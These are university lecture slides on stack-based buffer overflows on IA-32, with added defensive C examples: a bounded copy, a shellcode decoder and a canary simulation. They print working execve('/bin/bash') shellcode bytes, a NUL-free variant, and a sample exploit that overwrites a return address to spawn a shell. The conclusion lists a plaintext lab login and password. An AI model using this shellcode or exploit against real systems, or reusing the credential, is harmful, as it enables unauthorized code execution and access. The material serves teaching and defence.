Stack-based buffer overflows

Yves Younan
DistriNet, Department of Computer Science, Katholieke Universiteit Leuven, Belgium
Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks, March 22

Overview
- Introduction
- Buffer overflows
- Stack-based buffer overflows
- Shellcode
- Code injection
- Conclusion
Introduction
- Buffer overflows: writes outside the boundaries of an array
- Can be used to overwrite adjacent memory
- The stack contains control-flow related data, e.g. return addresses
- Overwriting this data allows an attacker to execute new or existing code
Buffer overflows (on IA32)

    #include <string.h>

    int main(int argc, char **argv)
    {
        int a;
        char buf[100];
        strcpy(buf, argv[1]);   /* unbounded copy: the source length is never checked */
    }

- int a is allocated on the stack: 4 bytes
- buf has memory allocated for 100 chars: 100 bytes
- argv[1] could be larger than that, allowing an attacker to overwrite a in this example
Buffer overflow on IA32 (stack layout)

    High addr
      int a
      char buf[100]
    Low addr
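The bounded copy that the slide's strcpy(buf, argv[1]) lacks, as an added C example that is not part of the slides: copy_bounded(), sentinel_after_copy() and accepts_length() are names chosen here, and the 100-byte buffer next to an int mirrors the slide's main(). The copy is refused outright when the source does not fit, so the neighbouring variable can never be reached.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Copy src into dst (capacity dst_size, terminator included).
 * Returns 0 on success, -1 if src does not fit; on failure dst is left
 * as an empty string instead of a truncated or unterminated one. */
int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    if (dst_size == 0)
        return -1;
    /* look for the terminator within the destination's capacity only */
    const char *end = memchr(src, '\0', dst_size);
    if (end == NULL) {            /* src is at least dst_size bytes long */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, (size_t)(end - src) + 1);   /* includes the NUL */
    return 0;
}

/* Same layout as the slide's main(): an int beside a 100-byte buffer.
 * Returns the int after the copy attempt; with the bounded copy it is
 * the same value whatever the input length. */
int sentinel_after_copy(const char *input)
{
    volatile int a = 0x41414141;   /* constructed sentinel value */
    char buf[100];
    if (copy_bounded(buf, sizeof buf, input) != 0)
        fprintf(stderr, "rejected: %zu-byte input does not fit in %zu bytes\n",
                strlen(input), sizeof buf);
    return a;
}

/* Constructed input of len 'A' bytes (len < 512); reports copy_bounded()'s
 * verdict for the 100-byte buffer: 0 for len <= 99, -1 from 100 upwards. */
int accepts_length(size_t len)
{
    char src[512], buf[100];
    if (len >= sizeof src)
        return -1;
    memset(src, 'A', len);
    src[len] = '\0';
    return copy_bounded(buf, sizeof buf, src);
}

int main(void)
{
    char big[300];                 /* constructed over-long argument */
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    printf("sentinel after short input: 0x%x\n", sentinel_after_copy("hello"));
    printf("sentinel after long input:  0x%x\n", sentinel_after_copy(big));
    printf("99 bytes fit: %d, 100 bytes fit: %d\n",
           accepts_length(99) == 0, accepts_length(100) == 0);
    return 0;
}
```

memchr is used rather than strlen on purpose: strlen would scan the whole attacker-controlled string, while memchr stops after dst_size bytes, so the check itself cannot be driven out of bounds by an unterminated source.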
Stack-based buffer overflows

    #include <string.h>

    void f1(char *a)
    {
        char buffer[100];
        strcpy(buffer, a);   /* a longer than 99 chars overwrites f1's saved frame pointer and return address */
    }

    void f0(char *b)
    {
        f1(b);
    }
Stack-based buffer overflows: stack frames of f0 and f1

    f0:                High addr
      …                +------------------------+
      call f1          | Return address f0      |  stack frame f0
      …                | Saved Frame Ptr f0     |
                       | Local variables f0     |
                       | Arguments f1           |
    f1:                +------------------------+
      buffer[]         | Return address f1      |  stack frame f1
      …                | Saved Frame Ptr f1     |  (overflow of Buffer runs upward over the
      overflow()       | Buffer (injected code) |   saved frame pointer and return address;
                       +------------------------+   the return address now points into the
                       Low addr                     injected code)
Shellcode
- Code to execute once the return address has been overwritten
- Usually inserted into the buffer that is used to overflow
- Some subtleties: a NULL byte terminates strcpy, a newline (\n) terminates gets
Example code

    #include <unistd.h>

    int main()
    {
        char *argv[2];
        argv[0] = "/bin/bash";
        argv[1] = 0;
        execve(argv[0], argv, 0);
    }
Example transformed to assembly

    main:
        push $0x68          # Place "h" on the stack (imm8 is extended to 4 bytes, so this also supplies the terminating NULs).
        push $0x7361622f    # Place "sab/" on the stack.
        push $0x6e69622f    # Place "nib/" on the stack.
        mov %esp,%ebx       # Copy the pointer to /bin/bash to ebx.
        xor %edx,%edx       # Empty edx.
        push %edx           # Place a NULL on the stack to terminate the argv.
        push %ebx           # Place the pointer to /bin/bash on the stack.
        mov %esp,%ecx       # Copy the pointer to the pointer to /bin/bash into ecx.
        mov $0xb,%eax       # Let the syscall know we want execve.
        int $0x80           # Do the system call.
Shellcode

    (gdb) x/27b main
    0x…:  0x6a 0x68 0x68 0x2f 0x62 0x61 0x73 0x68
    0x…:  0x2f 0x62 0x69 0x6e 0x89 0xe3 0x31 0xd2
    0x…:  0x52 0x53 0x89 0xe1 0xb8 0x0b 0x00 0x00
    0x…:  0x00 0xcd 0x80

The mov $0xb,%eax encodes as b8 0b 00 00 00: three NUL bytes, which would stop strcpy before the int $0x80 is copied into the buffer.
Shellcode (NUL-free version)

        .globl main
        .type main, @function
    main:
        push $0x68
        push $0x7361622f
        push $0x6e69622f
        mov %esp,%ebx
        xor %edx,%edx
        push %edx
        push %ebx
        mov %esp,%ecx
        xor %eax,%eax       # set %eax to 0
        mov $0xb,%al        # copy 0xb into %al (least significant byte of %eax)
        int $0x80
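To check the gdb byte dump against the two assembly listings, here is an added C example (written for this page, not part of the slides): a decoder for only the handful of IA-32 opcodes these listings use, which also counts the 0x00 bytes that the second listing removes. The function names are chosen here; the two byte arrays are copied from the gdb dump and from the exploit's shellcode[] on the later slide. It is not a general disassembler.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static const char *reg32[8] = { "eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi" };
static const char *reg8[8]  = { "al", "cl", "dl", "bl", "ah", "ch", "dh", "bh" };

/* Little-endian 32-bit immediate, as pushed by "push $0x7361622f". */
static uint32_t le32(const unsigned char *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Decode the instruction at code[i] into AT&T syntax; returns its length in
 * bytes, or 0 for anything outside the opcodes the slides use. */
size_t decode_one(const unsigned char *code, size_t len, size_t i, char *out, size_t outsz)
{
    unsigned char op = code[i];
    size_t left = len - i;
    if (op == 0x6a && left >= 2) {                          /* push imm8 (sign-extended to 32 bits) */
        snprintf(out, outsz, "push $0x%x", (unsigned)code[i + 1]);
        return 2;
    }
    if (op == 0x68 && left >= 5) {                          /* push imm32 */
        snprintf(out, outsz, "push $0x%x", le32(code + i + 1));
        return 5;
    }
    if ((op == 0x89 || op == 0x31) && left >= 2 && (code[i + 1] >> 6) == 3) {
        unsigned reg = (code[i + 1] >> 3) & 7, rm = code[i + 1] & 7;   /* ModRM, register form */
        snprintf(out, outsz, "%s %%%s,%%%s", op == 0x89 ? "mov" : "xor", reg32[reg], reg32[rm]);
        return 2;
    }
    if (op >= 0x50 && op <= 0x57) {                         /* push r32 */
        snprintf(out, outsz, "push %%%s", reg32[op - 0x50]);
        return 1;
    }
    if (op >= 0xb0 && op <= 0xb7 && left >= 2) {            /* mov imm8,r8 */
        snprintf(out, outsz, "mov $0x%x,%%%s", (unsigned)code[i + 1], reg8[op - 0xb0]);
        return 2;
    }
    if (op >= 0xb8 && op <= 0xbf && left >= 5) {            /* mov imm32,r32 */
        snprintf(out, outsz, "mov $0x%x,%%%s", le32(code + i + 1), reg32[op - 0xb8]);
        return 5;
    }
    if (op == 0xcd && left >= 2) {                          /* int imm8 */
        snprintf(out, outsz, "int $0x%x", (unsigned)code[i + 1]);
        return 2;
    }
    return 0;
}

/* Print every instruction with its bytes; return the instruction count, or
 * -1 on an unknown opcode. *nuls receives the number of 0x00 bytes, the
 * property that decides whether strcpy() copies the whole sequence. */
int decode_all(const unsigned char *code, size_t len, int *nuls)
{
    char text[48];
    int count = 0;
    *nuls = 0;
    for (size_t i = 0; i < len; ) {
        size_t n = decode_one(code, len, i, text, sizeof text);
        if (n == 0) {
            printf("%04zx: unknown opcode 0x%02x\n", i, code[i]);
            return -1;
        }
        printf("%04zx: %-20s|", i, text);
        for (size_t k = 0; k < n; k++) {
            printf(" %02x", code[i + k]);
            if (code[i + k] == 0)
                (*nuls)++;
        }
        printf("\n");
        i += n;
        count++;
    }
    return count;
}

int instr_count(const unsigned char *code, size_t len) { int n; return decode_all(code, len, &n); }
int nul_count(const unsigned char *code, size_t len)   { int n; decode_all(code, len, &n); return n; }

/* The two byte sequences from the slides: the gdb dump of the first listing
 * (mov $0xb,%eax) and the exploit's shellcode[] (xor %eax,%eax; mov $0xb,%al). */
static const unsigned char with_nuls[27] = {
    0x6a,0x68, 0x68,0x2f,0x62,0x61,0x73, 0x68,0x2f,0x62,0x69,0x6e, 0x89,0xe3, 0x31,0xd2,
    0x52, 0x53, 0x89,0xe1, 0xb8,0x0b,0x00,0x00,0x00, 0xcd,0x80 };
static const unsigned char nul_free[26] = {
    0x6a,0x68, 0x68,0x2f,0x62,0x61,0x73, 0x68,0x2f,0x62,0x69,0x6e, 0x89,0xe3, 0x31,0xd2,
    0x52, 0x53, 0x89,0xe1, 0x31,0xc0, 0xb0,0x0b, 0xcd,0x80 };

int main(void)
{
    int nuls, n;
    n = decode_all(with_nuls, sizeof with_nuls, &nuls);
    printf("first listing: %d instructions, %d NUL bytes\n\n", n, nuls);
    n = decode_all(nul_free, sizeof nul_free, &nuls);
    printf("second listing: %d instructions, %d NUL bytes\n", n, nuls);
    return 0;
}
```

Running it reproduces both listings from the raw bytes and shows the one place they differ: the 5-byte mov $0xb,%eax carries three NUL bytes, the 4-byte xor/mov-al pair carries none.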
Sample vulnerable program

    #include <string.h>

    void function(int a, char *b)
    {
        char string1[10];
        char string2[50];
        strcpy(string2, b);   /* no length check on b */
    }

    int main(int argc, char **argv)
    {
        function(1, argv[1]);
    }
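As an added example (not the slide's code), the check a stack canary performs, modelled on function() above: struct frame reproduces the order string2, string1, then a guard word standing in for the saved frame pointer and return address, and copy_and_check_guard() plays the role of the function epilogue. All names and the GUARD value are constructed for the demonstration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed guard value. Its bytes include 0x00, 0x0a and 0x0d, so a copy
 * made with strcpy() or gets() cannot reproduce it by accident. */
#define GUARD 0x0d0aff00u

struct frame {
    char string2[50];   /* lowest address: the buffer strcpy() writes into */
    char string1[10];   /* next local: silently corrupted first */
    uint32_t guard;     /* stands in for saved frame pointer / return address */
};

/* Simulate strcpy(string2, b) for an input of len bytes, then verify the
 * guard as a stack protector does in the epilogue. Returns 1 if the guard
 * is intact, 0 if it was overwritten (where the protector would abort). */
int copy_and_check_guard(const unsigned char *input, size_t len)
{
    struct frame f;
    unsigned char *bytes = (unsigned char *)&f;   /* byte view keeps the copy well-defined C */
    memset(&f, 0, sizeof f);
    f.guard = GUARD;
    if (len > sizeof f)            /* cap so the simulation stays inside the struct */
        len = sizeof f;
    memcpy(bytes + offsetof(struct frame, string2), input, len);
    return f.guard == GUARD;
}

/* Distance from the start of string2 to the guard: 50 + 10 = 60 bytes. */
size_t guard_offset(void)
{
    return offsetof(struct frame, guard) - offsetof(struct frame, string2);
}

/* Constructed input of len 'A' bytes (len <= 256); returns the guard verdict. */
int guard_survives(size_t len)
{
    unsigned char input[256];
    if (len > sizeof input)
        return -1;
    memset(input, 'A', len);
    return copy_and_check_guard(input, len);
}

int main(void)
{
    printf("guard sits %zu bytes past string2\n", guard_offset());
    for (size_t len = 40; len <= 72; len += 8)
        printf("%2zu-byte input: guard %s\n", len,
               guard_survives(len) ? "intact" : "OVERWRITTEN");
    return 0;
}
```

Two things the run makes visible: inputs of 51 to 60 bytes already corrupt string1 without touching the guard, because a canary protects the control data above the locals and not the neighbouring variables; and the guard is reached here at 60 bytes, whereas the exploit on the next slide places its address at offset 68, the difference being the saved frame pointer and whatever padding the compiler inserts between the locals and the return address.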
Sample exploit

    #include <string.h>
    #include <unistd.h>

    char shellcode[] =
        "\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89"
        "\xe3\x31\xd2\x52\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80";

    #define ADDR 0xbffffe2c   // address the overwritten return address will point to

    int main()
    {
        char overflow[73];
        char *argv[3] = { "./bufferoverflow", overflow, NULL };
        memset(overflow, '\x90', 72);                     // fill with NOPs
        *(long *) &overflow[68] = ADDR;                   // replace ret. addr.
        memcpy(overflow, shellcode, strlen(shellcode));   // shellcode at the start of the buffer
        overflow[72] = '\0';                              // terminate the argument string
        execve(argv[0], argv, 0);                         // exec program
    }
Conclusion
- Follow “Gera’s Insecure Programming by example”
- Login/pass for the computers: cstudy/distrinet